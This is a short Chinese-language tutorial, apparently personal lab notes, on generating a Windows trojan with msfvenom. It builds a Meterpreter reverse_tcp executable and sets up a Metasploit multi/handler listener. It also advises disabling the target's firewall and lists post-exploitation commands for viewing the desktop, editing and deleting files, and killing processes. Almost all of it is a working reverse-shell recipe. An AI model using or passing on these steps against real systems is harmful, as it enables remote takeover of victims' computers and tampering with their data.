监听Windows（生成木马）

sudo su 

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=ip地址 LPORT=端口 -f exe -o test.exe

注意：把生成的文件拷贝到windows虚拟机上（注意关闭防火墙等）

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost IP地址

set lport 端口

exploit

注意：

kali采用桥接方式，否则启动时，就不动了：

端口被占用：

在终端输入 “netstat -tulpen”，查看进程端口信息

命令”fuser -k 端口号/tcp“，删除端口进程

常用命令：

1、获取桌面图像：run vnc

2、更改文件内容：edit 文件

3、展示进程：ps

4、关闭记事本程序：ps kill 进程号

5、删除文件：rm 文件